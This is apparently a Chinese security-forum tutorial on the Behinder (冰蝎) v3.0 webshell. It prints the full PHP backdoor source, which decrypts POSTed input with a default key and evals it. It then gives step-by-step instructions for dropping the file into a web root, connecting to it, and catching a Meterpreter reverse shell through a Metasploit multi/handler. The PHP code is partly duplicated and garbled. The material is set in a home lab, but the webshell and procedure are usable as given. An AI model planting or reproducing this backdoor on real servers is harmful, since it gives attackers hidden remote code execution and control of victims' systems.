冰蝎v3.0 beta 6 连接木马到反弹shell拿到meterpreter权限全过程

1596376292   ·   发表于 2020-11-08 12:41:47   ·   技术文章

一.冰蝎简介

1.什么是冰蝎

“冰蝎”是一个动态二进制加密网站管理客户端。在实战中一代webshell管理工具“菜刀”的流量特征非常明显,很容易就被安全设备检测到。基于流量加密的webshell变得越来越多,“冰蝎”在此应运而生。
一.冰蝎连接getshell方法
1.加入冰蝎特有的的PHP木马,(注意:使用一句话木马无法连接冰蝎),连接密码可以随意改动格式为md5 32为的前16为值 md5(admin)[0-16]
<?php
@errorreporting(0);
session_start();
$key=”e45e329feb5d925b”; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
<?php
@error_reporting(0);
session_start();
$key=”e45e329feb5d925b”; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION[‘k’]=$key;
$post=file_get_contents(“php://input”);
if(!extension_loaded(‘openssl’))
{
$t=”base64
“.”decode”;
$post=$t($post.””);

  1. for($i=0;$i<strlen($post);$i++) {
  2. $post[$i] = $post[$i]^$key[$i+1&15];
  3. }
  4. }
  5. else
  6. {
  7. $post=openssl_decrypt($post, "AES128", $key);
  8. }
  9. $arr=explode('|',$post);
  10. $func=$arr[0];
  11. $params=$arr[1];
  12. class C{public function __invoke($p) {eval($p."");}}
  13. @call_user_func(new C(),$params);

?>

二.冰蝎getshell

1.建好的木马放入我们phpstudy网站的根目录

2.到我们的位置为 192.168.43.61/1.php

3.始连接冰蝎,点击保存


在冰蝎处 显示为此页面,则表示连接成功

三.开始反弹shell启用监听meterpreter功能

1.点击反弹shell

2.在IP地址上写上你本机kali的ip
2.1查找kali ip 的方法 命令框中输入 ip addr

3.2填上ip和端口,端口可以任意填写

此时注意不用那么快点击“给我连按钮”
4.先打开kali的msf监听设备 在命令框中输入msfconsole

此时为打开状态
5.使用use exploit/multi/handler 命令

此时弹出让我们输入payload的命令我们将此命令输入set payload php/meterpreter/reverse_tcp

此时输入成功
6.show options 我们就可以看设置了,我们会发现我们的靶机已经连上了

7.接着我们连上我们的主机 set lhost 192.168.43.61

8.Show options 我们会发现我们的主机已经连上
9.执行 exploit 命令执行监听,此时我们就可以返回冰蝎反弹shell执行接下来的操作
10 点击给我连

11.我们在返回kali 此时我们就已经可以开始监听了

12.执行 sysinfo 我们就可以知道靶机的系统信息

结束

用户名金币积分时间理由
veek 50.00 0 2020-11-09 09:09:17 一个受益终生的帖子~~

打赏我,让我更有动力~

0 条回复   |  直到 2020-11-8 | 1574 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.